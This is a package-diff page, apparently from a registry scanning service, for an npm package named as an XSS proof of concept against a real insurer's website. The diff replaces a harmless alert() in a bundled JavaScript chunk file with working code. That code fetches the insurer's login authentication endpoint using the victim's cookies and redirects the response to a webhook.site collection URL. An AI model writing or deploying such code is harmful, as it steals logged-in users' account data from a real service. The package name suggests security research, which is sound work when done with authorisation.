poc-malakoffhumanis-xss2 1.0.0 → 1.0.2

Sign up to get free protection for your applications and to get access to all the features.
Files changed (2) hide show
  1. package/package.json +1 -1
  2. package/static/js/2.14d2c6fa.chunk.js +7 -1
package/package.json CHANGED
@@ -1,6 +1,6 @@
1
1
  {
2
2
  "name": "poc-malakoffhumanis-xss2",
3
- "version": "1.0.0",
3
+ "version": "1.0.2",
4
4
  "description": "",
5
5
  "main": "index.js",
6
6
  "scripts": {
package/static/js/2.14d2c6fa.chunk.js CHANGED
@@ -1 +1,7 @@
1
- alert()
1
+ const leak_url = "https://webhook.site/39bb8c4f-43f5-478e-ad53-e4547ad0fe5a"
2
+
3
+ fetch("https://connexion.malakoffhumanis.com/particuliers/login/api/authenticate", {
4
+ credentials: "include"
5
+ }).then(d => d.text()).then(d => {
6
+ location.href = `${leak_url}?data=${encodeURIComponent(d)}`
7
+ })